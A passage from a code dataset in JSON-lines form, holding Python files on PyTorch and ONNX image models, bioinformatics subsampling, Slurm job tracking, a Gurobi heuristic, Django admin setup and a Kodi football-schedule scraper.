Step [{}/{}], Loss: {:.4f}' \r\n .format(epoch+1, num_epochs, i+1, total_step, loss.item()))\r\n\r\n #compute the accuracy of our model on the validation set\r\n class_correct = list(0. for i in range(10))\r\n class_total = list(0. for i in range(10)) \r\n with torch.no_grad():\r\n correct = 0\r\n total = 0\r\n for images, labels in test_loader:\r\n images = images.to(device)\r\n labels = labels.to(device)\r\n outputs = net(images)\r\n _, predicted = torch.max(outputs.data, 1)\r\n c = (predicted == labels).squeeze()\r\n \r\n total += labels.size(0)\r\n correct += (predicted == labels).sum().item()\r\n \r\n for i in range(2):\r\n label = labels[i]\r\n class_correct[label] += c[i].item()\r\n class_total[label] += 1\r\n \r\n \r\n accuracy = 100 * correct / total\r\n print('Test Accuracy of the model on the test images: {} %'.format(accuracy))\r\n \r\n #if the accuracy obtained with these new weights is better than whatever\r\n #we had as our best model before, we save the best_model in a .ckpt file\r\n if(accuracy) > best_model_accuracy:\r\n \r\n print(\"DAMN!!! Good Job <3!!!\")\r\n torch.save(net.state_dict(), 'best_model.ckpt')\r\n best_model_accuracy = accuracy\r\n \r\n #gives the accuracy of our model on each of the labels, separately\r\n for i in range(10):\r\n print('Accuracy of %d : %2d %%' % (\r\n i, 100 * class_correct[i] / class_total[i]))\r\n \r\n loss_accuracy_lr[epoch, 0] = loss.item() #loss on training set\r\n loss_accuracy_lr[epoch, 1] = (100 * correct / total) #accuracy on valid set\r\n loss_accuracy_lr[epoch, 2] = epoch #nb of epochs\r\n \r\n return best_model_accuracy\r\n\r\n#return the prediction on our validation set, which an array of tensors\r\n#as input (not the dataloader)\r\ndef getPredictionsValidation(test_images):\r\n predicted = np.zeros((len(test_images)))\r\n for i in range(len(test_images)):\r\n image = test_images[i,:,:,:]\r\n image = image.reshape(1,1,64,64)\r\n output = net(image)\r\n _, predicted[i] = torch.max(output.data, 1)\r\n \r\n return predicted\r\n\r\n#return a list of the wrongly labeled images in the test set (aka validation set)\r\ndef getWrongs(predicted, y_tensor_test):\r\n \r\n y_tensor_test = y_tensor_test.numpy()\r\n \r\n wrongs = []\r\n for i in range(len(predicted)):\r\n if predicted[i] != y_tensor_test[i]:\r\n wrongs.append(i)\r\n \r\n return wrongs\r\n\r\n#function that pre process the images for them to be used on the VGG model\r\ndef VGG_get_loaders():\r\n \r\n train_images = pd.read_pickle('train_images.pkl')\r\n train_labels = pd.read_csv('train_labels.csv')\r\n\r\n train_images = preprocess(train_images)\r\n train_images = train_images.reshape((40000,1,64,64))\r\n train_images_3 = np.zeros((40000,3,64,64))\r\n \r\n train_images_3[:,0,:,:] = train_images\r\n train_images_3[:,1,:,:] = train_images\r\n train_images_3[:,2,:,:] = train_images\r\n train_images = train_images_3\r\n \r\n #Pre-Process the csv-files of the labels \r\n train_labels = train_labels.drop(['Id'], axis=1)\r\n train_labels = train_labels.values\r\n train_labels = np.reshape(train_labels, (-1))\r\n\r\n X_train, X_test, y_train, y_test = train_test_split(train_images, train_labels, test_size=0.10, random_state=2)\r\n #X_test, X_rem, y_test, y_rem = train_test_split(X_test, y_test, test_size=0.90, random_state=2)\r\n \r\n X_tensor_train = torch.tensor(X_train) \r\n y_tensor_train = torch.tensor(y_train)\r\n X_tensor_test = torch.tensor(X_test)\r\n y_tensor_test = torch.tensor(y_test)\r\n\r\n train_dataset = CustomDataset(X_tensor_train, y_tensor_train)\r\n test_dataset = CustomDataset(X_tensor_test, y_tensor_test)\r\n\r\n train_loader = torch.utils.data.DataLoader(dataset=train_dataset,batch_size=2, shuffle=True)\r\n test_loader = torch.utils.data.DataLoader(dataset=test_dataset,batch_size=2, shuffle=True)\r\n \r\n return train_loader, test_loader, X_tensor_test, y_tensor_test\r\n \r\n'''\r\nMAIN\r\n'''\r\ncross_entropy = nn.CrossEntropyLoss()\r\n\r\n#LOAD MODEL\r\nnet = Net2()\r\n#net = Net3()\r\n#net = vgg.vgg16(pretrained=True)\r\n\r\n#SAVES CURRENT BEST ACCURACY + LOAD BEST MODEL\r\n#best_model_accuracy = 0\r\n#net.load_state_dict(torch.load('90_5.ckpt'))\r\n\r\n#GET INDICES OF WRONGLY PREDICTED IMAGES IN VALIDATION SET\r\n#_,_, X_tensor_test, y_tensor_test = build_loaders()\r\n#predicted = getPredictionsValidation(X_tensor_test)\r\n#wrongs = getWrongs(predicted, y_tensor_test)\r\n\r\n#GET PREDICTED LABELS FOR THE TEST SET\r\n#predicted = predictTest() \r\n\r\n#TRAIN THE MODEL\r\n\r\n#load the datasets into a loader\r\ntrain_loader, test_loader,_,_ = build_loaders() \r\n\r\nnum_epochs = 20\r\nlearning_rate = 0.0007\r\nloss_accuracy_lr = np.zeros((20,3)) \r\n#we compare the accuracy of our newly trained model to our previous best model\r\nfor epoch in range(num_epochs):\r\n best_model_accuracy = makeItLearn(epoch, best_model_accuracy)\r\n","repo_name":"VinceBaz/COMP551_3","sub_path":"ourCode.py","file_name":"ourCode.py","file_ext":"py","file_size_in_byte":15627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"42436113834","text":"import torch.nn.functional as F\nfrom data.images import CIFAR10_NAME, TINY_IMAGENET_NAME\nfrom torch import Tensor, nn\n\nfrom models.basenet import BaseNet\n\n\nclass VanillaCNN(BaseNet):\n def __init__(self, net_id: int, class_id: int, dataset_name: str) -> None:\n super(VanillaCNN, self).__init__(net_id, class_id)\n\n assert dataset_name in [TINY_IMAGENET_NAME, CIFAR10_NAME]\n\n if dataset_name == TINY_IMAGENET_NAME:\n config = [[8, 3, 2], [16, 3, 2], [32, 3, 2], [64, 3, 2], [64, 3, 2]]\n input_size = 64\n in_ch = 3\n num_classes = 200\n else:\n config = [[8, 3, 2], [8, 3, 1], [32, 3, 2], [64, 3, 1], [64, 3, 2]]\n input_size = 32\n in_ch = 3\n num_classes = 10\n\n tot_stride = 1\n self.layers = nn.ModuleList()\n for conf in config:\n out_ch, ks, stride = conf\n self.layers.append(nn.Conv2d(in_ch, out_ch, ks, stride=stride, padding=1))\n in_ch = out_ch\n tot_stride *= stride\n\n final_size = input_size // tot_stride\n out_ch = config[-1][0]\n self.layers.append(nn.Linear(final_size * final_size * out_ch, num_classes))\n\n def forward(self, x: Tensor) -> Tensor:\n for layer in self.layers[:-1]:\n x = F.leaky_relu(layer(x))\n x = x.view(x.size()[0], -1)\n x = self.layers[-1](x)\n\n return x\n\n def func_forward(self, x: Tensor, prep: Tensor) -> Tensor:\n params = self.params_from_prep(prep)\n\n for i in range(len(self.layers[:-1])):\n stride = self.layers[i].stride\n idx = i * 2\n x = F.conv2d(x, params[idx], bias=params[idx + 1], stride=stride, padding=1)\n x = F.leaky_relu(x)\n\n x = x.view(x.size()[0], -1)\n x = F.linear(x, params[-2], bias=params[-1])\n\n return x\n","repo_name":"CVLAB-Unibo/netspace","sub_path":"models/vanillacnn.py","file_name":"vanillacnn.py","file_ext":"py","file_size_in_byte":1869,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"34074162847","text":"from collections import deque\n\ndef solution(circle: deque, K: int):\n counter = 0\n while circle:\n counter += 1\n if counter % K == 0:\n print(circle.popleft(), end='')\n if circle:\n print(', ', end='')\n else:\n circle.append(circle.popleft())\n\nN, K = map(int, input().split())\ncircle = deque([i for i in range(1, N + 1)])\nprint('<', end='')\nsolution(circle, K)\nprint('>')\n","repo_name":"lawnmowing-programmer/algo","sub_path":"홍석민/week3/2023.03.13/boj11866/11866.py","file_name":"11866.py","file_ext":"py","file_size_in_byte":442,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"72856865607","text":"import onnxruntime\nimport numpy as np\nimport cv2 as cv\nimport numba\nEP_list = ['CUDAExecutionProvider', 'CPUExecutionProvider']\n\nort_session = onnxruntime.InferenceSession(\"model.onnx\", providers=EP_list)\n\n@numba.njit\ndef assemblyFrame(ort_outputs, frame):\n colors =[\n [255, 0, 0],\n [255, 255, 0],\n [64, 255, 0],\n [0, 255, 255],\n [0, 64, 255],\n [255, 0, 128],\n [128, 0, 255],\n [128, 128, 128],\n [255, 128, 0],\n [0, 128, 255],\n [255, 255, 255],\n [0, 0, 0],\n [179, 130, 122],\n [222, 222, 222]\n ] \n\n # res = np.zeros([256,256,3], dtype=numba.uint8)\n res = [[[0,0,0] for _ in range(256)] for _ in range(256)]\n\n i_iter = len(ort_outputs[0][0])\n k_iter = len(ort_outputs[0][0,0])\n n_iter = len(ort_outputs[0][0,0][0])\n\n for k in range(k_iter):\n for n in range(n_iter):\n colorMax = [0.0, 13.0]\n for i in range(i_iter):\n val = ort_outputs[0][0,i][k][n]\n if val > colorMax[0]:\n colorMax = [val, i]\n\n color = colors[int(colorMax[1])]\n\n res[k][n] = color\n\n return np.array(res, dtype=np.uint8), frame\n\n\n\n \ndef processing(frame):\n resized_frame = cv.resize(frame, (256, 256)) \n frame = np.array([resized_frame[:, :, 0], resized_frame[:, :, 1], resized_frame[:, :, 2]], dtype=np.float32)\n ort_inputs = {ort_session.get_inputs()[0].name: np.array([frame])}\n ort_outputs = ort_session.run(None, ort_inputs)\n res = assemblyFrame(ort_outputs, resized_frame)\n return res\n\n\n\n\n\n\n\n\n\n\n","repo_name":"Firesieht/organs","sub_path":"recognise.py","file_name":"recognise.py","file_ext":"py","file_size_in_byte":1612,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"70189327370","text":"# Python script to take an input corresponding to either a reference\n# (R4IDs) or query sequencing run, and output a random subsample of reads.\n\n# Author: Joe Parker (@lonelyjoeparker // joe@lonelyjoeparker.com)\n\n###########################################\n# Pseudocode for selecting subsets of reads\n#\n# add sequences\n#for r in read:\n#\tadd r.index to sequence hash with value r.seq\n#\tadd random to index hash with value r.index\n#\n# order by random integers\n#new keys hash = ordered random index hash\n#\n# select first n and output\n#for i in samples:\n#\tselect new keys hash [i]\n#\toutput append sequence hash [new keys hash[i]]\n\nimport argparse, random\nfrom Bio import SeqIO, SeqRecord\nfrom Bio.Seq import Seq\n\n# set up an argparse object to parse the N parameter\nparser = argparse.ArgumentParser(description='Python script to take an input corresponding to either a reference (R4IDs) or query sequencing run, and output a random subsample of reads.')\nparser.add_argument('N_subsamples', metavar='N', type=int, nargs='+', help='N - how many reads to subsample')\nparser.add_argument('input_file',type=argparse.FileType('r'),help='filename to open')\nparser.add_argument('output_file',type=argparse.FileType('w'),help='filename to write to')\n\n# evaluate the args\nargs = parser.parse_args()\n\n# set up input and output lists\ninput_sequences = {}\noutput_sequences = list()\n\n# read input\nwith args.input_file as file:\n sequence_file_iterator = SeqIO.parse(file,'fasta')\n for record in sequence_file_iterator:\n #print(record.description)\n #print(record.seq)\n input_sequences[record.id]=record\n\n file.close()\n\n#print 'total length of seqs hash dict ' + str(len(input_sequences))\n\n# pick subsamples\nfor i in range(0,args.N_subsamples[0]):\n\trandom_key = input_sequences.keys()[random.randint(0,len(input_sequences)-1)]\n\t#print str(i) + ': random key ' + random_key\n\toutput_sequences.append(input_sequences[random_key])\n\tdel input_sequences[random_key]\n\n# write output\t\nSeqIO.write(output_sequences,args.output_file,'fasta')\n","repo_name":"lonelyjoeparker/oddjects-sandbox","sub_path":"R4IDs/manuscript-analyses/simulate_partial_R4IDs.py","file_name":"simulate_partial_R4IDs.py","file_ext":"py","file_size_in_byte":2041,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"41184712479","text":"import os\n\n### === INITIALIZE === ###\n\nscript_name = os.path.realpath(__file__).split('/')[-1]\nwdir = os.path.realpath(__file__).split(script_name)[0]\nos.chdir(wdir)\n\n### === FUNCTIONS === ###\nprint_q = 'squeue --user=`whoami` --format=\"%.7A %.35j %.10u %.7C %.10M %.15l %.20R\"'\ndef store_job_info():\n os.system(print_q + ' > current_queue.tmp')\n file = open('current_queue.tmp','r')\n lines = file.readlines()\n file.close()\n job_names = []\n job_ids = []\n working_dirs = []\n for line in lines[1:]:\n job_name = line.split()[1]\n job_id = line.split()[0]\n os.system('scontrol show job {} > jobinfo.tmp'.format(job_id))\n file2 = open('jobinfo.tmp','r')\n lines2 = file2.readlines()\n file2.close()\n for line2 in lines2:\n if 'WorkDir' in line2:\n working_dir = line2.split('WorkDir=')[1].split('\\n')[0]\n job_names.append(job_name)\n job_ids.append(job_id)\n working_dirs.append(working_dir)\n os.system('rm current_queue.tmp')\n os.system('rm jobinfo.tmp') \n with open('.current_jobs.txt','w') as f:\n for job in range(len(job_ids)):\n f.write(job_ids[job])\n f.write('\\t')\n f.write(job_names[job])\n f.write('\\t')\n f.write(working_dirs[job])\n f.write('\\n')\n return job_ids\n\ndef find_completed_jobs(job_ids):\n file = open('.previous_jobs.txt','r')\n lines = file.readlines()\n file.close()\n count = 0\n for line in lines:\n if line.split()[0] not in job_ids:\n count += 1\n print('This job is no longer running since the last time you checked: \\n NAME: {} \\n JOB ID: {} \\n Working Directory: {}.'.format(line.split()[1],line.split()[0],line.split()[2]))\n if count == 0:\n print('No jobs have ended since the last time you checked!')\n\n\n### === MAIN === ###\nif '.current_jobs.txt' not in os.listdir():\n print('No previously submitted jobs are stored. Either the file was deleted or this is your first time running this script.')\n store_job_info()\n print('The current running jobs have now been stored. Run this script again and you should not see this message.')\n\nelse:\n os.system('mv .current_jobs.txt .previous_jobs.txt')\n job_ids = store_job_info()\n print('Jobs you are currently running:')\n print('================================================================================================================')\n os.system(print_q)\n print('================================================================================================================')\n find_completed_jobs(job_ids)\n print('================================================================================================================')\n\n","repo_name":"hklem/slurm_job_tracking","sub_path":"jobcheck.py","file_name":"jobcheck.py","file_ext":"py","file_size_in_byte":2780,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"16"} +{"seq_id":"16660224581","text":"from lib.mongo_connection import MongoConnection\nfrom lib.linguistic_functions import get_supported_languages\nfrom nlp.config import SERVER\nfrom polyglot.load import load_embeddings\n\n\ndef add_polyglot_default():\n \"\"\"Defining default polyglot models\"\"\"\n entities = []\n load_embeddings()\n polyglot_model = [\n {\n 'model_settings': {\n 'tag': 'I-LOC',\n 'polyglot_model': 'ner2',\n 'case_sensitive': True\n },\n 'training': 'finished',\n 'available': True,\n 'type': 'default_polyglot',\n 'description': 'Trained model based on a neural network, detected locations',\n 'name': 'Detects locations'\n },\n {\n 'model_settings': {\n 'tag': 'I-PER',\n 'polyglot_model': 'ner2',\n 'case_sensitive': True\n },\n 'training': 'finished',\n 'available': True,\n 'type': 'default_polyglot',\n 'description': 'Trained model based on a neural network, detected personality',\n 'name': 'Detects persons'\n },\n {\n 'model_settings': {\n 'tag': 'I-ORG',\n 'polyglot_model': 'ner2',\n },\n 'training': 'finished',\n 'available': True,\n 'type': 'default_polyglot',\n 'description': 'Trained model based on a neural network, detected organizations',\n 'name': 'Detects organizations'\n },\n # {\n # 'model_settings': {\n # 'tag': 'negative_word',\n # 'polyglot_model': 'sentiment2',\n # 'case_sensitive': False\n # },\n # 'training': 'finished',\n # 'available': True,\n # 'type': 'default_polyglot',\n # 'description': 'Trained model based on a neural network, detected negative words',\n # 'name': 'negative words'\n # },\n # {\n # 'model_settings': {\n # 'tag': 'positive_word',\n # 'polyglot_model': 'sentiment2',\n # 'case_sensitive': False\n # },\n # 'training': 'finished',\n # 'available': True,\n # 'type': 'default_polyglot',\n # 'description': 'Trained model based on a neural network, detected positive words',\n # 'name': 'positive words'\n # },\n # {'model_settings': {'tag': 'polarity_sentence', 'polyglot_model': 'sentiment2'},\n # 'status': 'train', 'available': True, 'type': 'default_polyglot',\n # 'name': 'Polyglot default detected polarity of sentence'},\n # {'model_settings': {'tag': 'polarity_text', 'polyglot_model': 'sentiment2'},\n # 'status': 'train', 'available': True, 'type': 'default_polyglot',\n # 'name': 'Polyglot default detected polarity of document'},\n ]\n\n mongo = MongoConnection()\n for language in SERVER['language']:\n # Adding Entities\n for model in polyglot_model:\n # full_name = Language.from_code(language).name\n # if full_name in tools.list_decode(\n # downloader.supported_languages(model['model_settings']['polyglot_model'])\n # ):\n if language in get_supported_languages(model['model_settings']['polyglot_model']):\n model['language'] = language\n model['training'] = 'finished'\n model['available'] = True\n # model['user'] = DEFAULT_USER[language]\n entities.append(model)\n find_entity = model.copy()\n del find_entity['description']\n find_model = mongo.default_entity.find_one(find_entity)\n if find_model is None:\n if '_id' in model:\n del model['_id']\n try:\n # model_id = mongo.default_entity.insert(model)\n mongo.default_entity.insert(model)\n except Exception:\n print(model)\n raise\n # mongo.users.update_one(\n # {'_id': DEFAULT_USER[language]},\n # {'$addToSet': {'entity': model_id}},\n # upsert=True\n # )\n return entities\n","repo_name":"dari28/RebuildPR","sub_path":"newsAPI/install/install_default_model.py","file_name":"install_default_model.py","file_ext":"py","file_size_in_byte":4409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"8109943999","text":"import gurobipy\n\nclass LeastStopsRemovalMIP(object):\n \"\"\"\n Assume that each stop adds to the total features linearly, and therefore\n solve a Knapsack problems to maximize the utility\n \"\"\"\n def __init__(self, dict_feat_gap, dict_stop_feat_weight,dict_stop_dual_val):\n self.dict_feat_gap = dict_feat_gap # dict[feat] = gap\n self.dict_stop_feat_weight = dict_stop_feat_weight # dict[stop_id][feat] = weight removal\n self.dict_stop_dual_val = dict_stop_dual_val # dict[stop_id] = dual value\n\n # MIP parameters\n self.modelOptim = gurobipy.Model(\"MIP for removal heuristic\")\n self.modelOptim.Params.LogToConsole = 0\n self.modelOptim.modelSense = gurobipy.GRB.MINIMIZE\n self.modelOptim.Params.LogFile = 'least_stop_mip.log'\n # self.modelOptim.Params.Method = -1\n\n self.EPSILON = 0.001\n self.bigM = 10000\n self.alpha = 10 # importance given to the reduced cost\n\n # storage\n self.var_activation_stop = {} # a dict[stop_id] = var\n self.var_violation_cst = {} # a dict[feature] = var\n\n\n def _create_var_stops(self):\n \"\"\"\n Create the stop variable, binary\n \"\"\"\n for stop_id in self.dict_stop_feat_weight:\n varname = 'act_' + stop_id\n cost = 1 + self.alpha * self.dict_stop_dual_val[stop_id]\n self.var_activation_stop[stop_id] = self.modelOptim.addVar(0,1,cost,gurobipy.GRB.BINARY,varname)\n\n\n def _create_var_violation(self):\n \"\"\"\n Create the violation variable, binary\n \"\"\"\n for feat in self.dict_feat_gap:\n varname = 'violation_' + feat\n cost = 0\n self.var_violation_cst[feat] = self.modelOptim.addVar(0,1,cost,gurobipy.GRB.BINARY,varname)\n\n\n def _cst_violation_feature(self,percentage =1):\n \"\"\"\n Ensure that the violation value only takes value one if the features constraints are actually violated.\n :param percentage: the percentage of the gap to be considered\n \"\"\"\n for feature in self.dict_feat_gap:\n cst_name = 'Violation_' + feature\n gap = percentage * self.dict_feat_gap[feature]\n\n if gap >=0:\n self.modelOptim.addConstr(sum(self.var_activation_stop[stop_id] * self.dict_stop_feat_weight[stop_id][feature] for stop_id in self.var_activation_stop.keys()) - gap >=\n - (1- self.var_violation_cst[feature]) * self.bigM,\n cst_name)\n else:\n self.modelOptim.addConstr(sum(self.var_activation_stop[stop_id] * self.dict_stop_feat_weight[stop_id][feature] for stop_id in self.var_activation_stop.keys()) - gap + self.EPSILON <=\n (1- self.var_violation_cst[feature]) * self.bigM,\n cst_name)\n\n\n def _cst_at_least_one_violated(self):\n \"\"\"\n Make sure that at least one of the constraints is violated\n \"\"\"\n cst_name = \"at_least_one_violated\"\n self.modelOptim.addConstr(sum(self.var_violation_cst[feat] for feat in self.var_violation_cst.keys()) >= 1,\n cst_name)\n\n def _cst_at_least_one_stop_selected(self):\n \"\"\"\n Make sure that at least one of the stops is selected. Which may not necessarily be the case if we have to introduce\n a gap due to initial infeasibility\n \"\"\"\n cst_name = \"at_least_one_stop\"\n self.modelOptim.addConstr(sum(self.var_activation_stop[stop_id] for stop_id in self.var_activation_stop.keys()) >= 1,\n cst_name)\n\n\n def _retrieve_solution(self):\n \"\"\"\n :return: a list of selected_stop\n \"\"\"\n list_stop_id = []\n for stop_id in self.var_activation_stop:\n var = self.var_activation_stop[stop_id]\n\n if abs(var.x) >= self.EPSILON:\n list_stop_id.append(stop_id)\n\n return list_stop_id\n\n\n def _deal_with_infeasible(self):\n \"\"\"\n Deal with infeasibility problem which may arise due to the limited number of stops tested\n :return the list of selected stop_id or all_stops_id\n \"\"\"\n nb_iter = 0\n while self.modelOptim.Status == gurobipy.GRB.INFEASIBLE and nb_iter < 7:\n nb_iter += 3\n # remove all constraints\n self.modelOptim.remove(self.modelOptim.getConstrs())\n self.modelOptim.update()\n\n # re -add the constraint\n self._cst_at_least_one_violated()\n percentage = (10-nb_iter)/10\n self._cst_violation_feature(percentage)\n self.modelOptim.optimize()\n\n\n if self.modelOptim.Status == gurobipy.GRB.INFEASIBLE:\n return list(self.var_activation_stop.keys())\n else:\n return self._retrieve_solution()\n\n\n def solve(self):\n \"\"\"\n Main function, solve the knapsack problem\n :return: the list of selected stop_id\n \"\"\"\n self._create_var_stops()\n self._create_var_violation()\n self._cst_at_least_one_violated()\n self._cst_violation_feature()\n self._cst_at_least_one_stop_selected()\n\n self.modelOptim.optimize()\n\n if self.modelOptim.Status == gurobipy.GRB.INFEASIBLE:\n return self._deal_with_infeasible()\n\n else:\n return self._retrieve_solution()\n","repo_name":"jpoulletXaccount/MIT_thesis_OR_ML","sub_path":"src/optimization_step/scp_approach/heuristics_improvement/least_stops_removal_MIP.py","file_name":"least_stops_removal_MIP.py","file_ext":"py","file_size_in_byte":5519,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"19082712151","text":"from django.contrib import admin\nfrom django.utils.translation import ugettext_lazy as _ul\n\nfrom apps.blogs.models import Category, Comment, Post, Tag\nfrom apps.generic.admin import GenericModelAdmin\n\n\n@admin.register(Tag)\nclass TagAdmin(GenericModelAdmin):\n pass\n\n\n@admin.register(Category)\nclass CategoryAdmin(GenericModelAdmin):\n list_display = (\n 'name',\n 'is_published',\n GenericModelAdmin.site_url,\n )\n list_filter = (\n 'is_published',\n 'categorytype'\n )\n fieldsets = (\n (None, {\n 'fields': (\n 'name',\n 'description',\n 'categorytype',\n 'image_class',\n )\n }),\n (_ul(u'Доступ'), {\n 'fields': (\n 'is_published',\n )\n }),\n (_ul(u'Seo'), {\n 'fields': (\n 'slug',\n 'seo_title',\n 'seo_description',\n 'seo_keywords',\n 'seo_author'\n )\n }),\n )\n search_fields = ('name', 'description',)\n\n\n@admin.register(Post)\nclass PostAdmin(GenericModelAdmin):\n list_display = (\n 'title',\n 'category',\n 'author',\n 'rate',\n 'view_count',\n 'num_comments',\n 'publication_date',\n 'is_published',\n GenericModelAdmin.site_url,\n )\n list_filter = (\n 'is_published',\n 'category',\n )\n fieldsets = (\n (None, {\n 'fields': (\n 'author',\n 'category',\n 'tags',\n 'title',\n 'picture',\n 'announcement',\n 'post',\n )\n }),\n (_ul(u'Доступ'), {\n 'fields': (\n 'is_published',\n 'publication_date',\n )\n }),\n (_ul(u'Seo'), {\n 'fields': (\n 'slug',\n 'seo_title',\n 'seo_description',\n 'seo_keywords',\n 'seo_author'\n )\n }),\n (_ul(u'Голосование'), {\n 'fields': (\n 'rate',\n )\n }),\n (_ul(u'Заметки'), {\n 'fields': (\n 'notes',\n )\n }),\n )\n filter_horizontal = ('tags',)\n search_fields = ('title', 'announcement',)\n\n def formfield_for_dbfield(self, db_field, *args, **kwargs):\n formfield = super(PostAdmin, self).formfield_for_dbfield(db_field, *args, **kwargs)\n if db_field.name == 'author':\n formfield.initial = kwargs['request'].user\n if db_field.name == 'seo_author':\n formfield.initial = kwargs['request'].user.get_full_name()\n if db_field.name == 'is_published':\n formfield.initial = False\n formfield.help_text = \"\"\"\n Перед публикацией разместите статью в\n <br>\n <a href=\"https://webmaster.yandex.ru/site/service-plugin.xml?host=22600389&service=ORIGINALS&need_auth=false&new_site=false\">\n Yandex оригинальные тексты</a>\n \"\"\" # noqa\n return formfield\n\n def get_queryset(self, request):\n qs = super(PostAdmin, self).get_queryset(request)\n return qs.exclude(category__categorytype=Category.CATEGORY_QUESTIONS)\n\n class Media:\n js = (\n '/static/jquery/jquery.min.js',\n '/static/jquery/jquery.synctranslit.min.js',\n '/static/site/js/admin.js',\n )\n\n\n@admin.register(Comment)\nclass CommentAdmin(GenericModelAdmin):\n search_fields = ('comment', 'author_username', 'author__username')\n list_display = (\n 'comment',\n 'creation_date',\n 'author_username',\n 'is_published',\n 'is_spam',\n GenericModelAdmin.site_url,\n )\n list_filter = (\n 'is_spam',\n 'is_published',\n )\n list_editable = (\n 'is_spam',\n 'is_published',\n )\n fieldsets = (\n (None, {\n 'fields': (\n 'comment',\n )\n }),\n (_ul(u'Доступ'), {\n 'fields': (\n 'is_published',\n 'is_spam'\n )\n }),\n (_ul(u'Голосование'), {\n 'fields': (\n 'rate',\n )\n }),\n (_ul(u'Связи'), {\n 'fields': (\n 'parent',\n 'post',\n )\n }),\n (_ul(u'Автор'), {\n 'fields': (\n 'author',\n 'author_username',\n 'ip_address',\n )\n }),\n )\n readonly_fields = ('parent', 'post', 'author', 'author_username')\n","repo_name":"animeshinvinci/obelektrike","sub_path":"apps/blogs/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":4815,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"32602022597","text":"# -*- coding: utf-8 -*-\n\nimport datetime\nimport re\n\nimport xbmc\nfrom bs4 import BeautifulSoup\n\nimport tools\nfrom lib import lang, art\nfrom lib.cache import Cache\nfrom lib.errors import WebSiteError\n\n\nclass LiveFootbalLOL:\n\n __web_url = 'http://livefootballol.me/'\n\n def __init__(self, settings):\n self.__settings = settings\n\n def get_menu(self):\n \"\"\"\n Get the list of LiveFootbalLOL categories: agenda and competitions\n\n :return: The list of LiveFootbalLOL categories\n :rtype: list\n \"\"\"\n return [\n {\n 'name': 'Hoy y mañana',\n 'icon': tools.build_path(self.__settings['path'], 'hoy_manana.png'),\n 'fanart': tools.build_path(self.__settings['path'], 'lfol_art.jpg')\n }, {\n 'name': 'Agenda 7 días',\n 'icon': tools.build_path(self.__settings['path'], 'siete_dias.png'),\n 'fanart': tools.build_path(self.__settings['path'], 'lfol_art.jpg')\n }, {\n 'name': 'Competiciones',\n 'icon': tools.build_path(self.__settings['path'], 'competiciones.png'),\n 'fanart': tools.build_path(self.__settings['path'], 'lfol_art.jpg')\n }]\n\n def __get_competition_art(self, competition):\n return {\n 'icon': art.get_competition_icon(competition, self.__settings['path'], default='futbol.png'),\n 'fanart': tools.build_path(self.__settings['path'], 'futbol_art.jpg')\n }\n\n @staticmethod\n def __get_event_name(event, date, time, competition):\n color = 'yellow'\n now = datetime.datetime.now()\n\n event_date = date.split('-')\n event_time = time.split(':')\n\n event_dt_start = datetime.datetime(\n int(event_date[2]),\n int(event_date[1]),\n int(event_date[0]),\n int(event_time[0]),\n int(event_time[1])\n )\n\n # noinspection PyTypeChecker\n if event_dt_start - datetime.timedelta(minutes=5) <= now <= event_dt_start + datetime.timedelta(hours=2):\n color = 'lime'\n elif now >= event_dt_start:\n color = 'orange'\n\n name = event.split('-')\n name = '%s - %s' % (name[0], name[1]) if len(name) == 2 else event\n\n return '[COLOR %s](%s %s:%s)[/COLOR] (%s) [B]%s[/B]' % \\\n (color, date[:5], event_time[0], event_time[1], lang.translate(competition), name)\n\n def __get_urls(self, page):\n agenda_url = None\n url = re.findall(r'href=[\\'\"]?([^\\'\" >]+).*title=\"Live Football Streaming\"', page, re.U)\n if url and len(url) == 1:\n agenda_url = url[0] if 'http' in url[0] else '%s%s' % (\n self.__web_url[:-1] if url[0].startswith('/') else self.__web_url, url[0])\n if agenda_url:\n return {'agenda': agenda_url}\n return None\n\n def get_all_events(self):\n \"\"\"\n Get all LiveFootbalLOL events\n\n :return: The list of LiveFootbalLOL events\n :rtype: list\n \"\"\"\n cache = Cache(self.__settings['path'])\n\n # Busca la URI de la agenda y los enlaces de los canales en caché\n page = cache.load(self.__web_url, False)\n if page:\n # La URI de la agenda está en caché, busca también los eventos\n events = cache.load(page['agenda'])\n if events:\n for event in events:\n event['name'] = self.__get_event_name(\n event['event'], event['date'], event['time'], event['competition'])\n return events\n\n # La URI de la agenda no está en cache\n # Vuelve a obtener la agenda y los eventos\n events = []\n\n # GET livefootballol.in\n page = tools.get_web_page(self.__web_url)\n\n # Averigua la URI de la agenda\n urls = self.__get_urls(page)\n if not urls:\n raise WebSiteError(\n u'Agenda no encontrada',\n u'Los de LiveFootbalLOL han hecho cambios en la Web',\n time=self.__settings['notify_secs']\n )\n\n # Guarda la URI de la agenda en caché\n cache.save(self.__web_url, urls)\n\n # GET agenda\n agenda = tools.get_web_page(urls['agenda'])\n\n # Obtiene la tabla de eventos\n a_events = re.findall(\n r'([0-9]{1,2}:[0-9]{2})\\s*<a href=[\\'\"]?(/streaming/(.*)/[0-9]{2}-[0-9]{2}-[0-9]{4}-.*)[\\'\"]>(.*)</a>',\n agenda,\n re.U)\n\n # Obtiene las ligas\n a_leagues = re.findall(\n r'<b>(.*)</b></li>\\s*<li>[0-9]{1,2}:[0-9]{2}\\s*'\n r'<a href=[\\'\"]?/streaming/(.*)/[0-9]{2}-[0-9]{2}-[0-9]{4}-.*[\\'\"]>',\n agenda,\n re.U)\n\n for a_event in a_events:\n league = self.__get_competition_name(a_event[2], a_leagues)\n competition_art = self.__get_competition_art(league)\n c_date = re.findall(r'([0-9]{2}-[0-9]{2}-[0-9]{4})-', tools.str_sanitize(a_event[1]), re.U)\n if c_date:\n events.append(\n {\n 'date': c_date[0],\n 'time': tools.str_sanitize(a_event[0]),\n 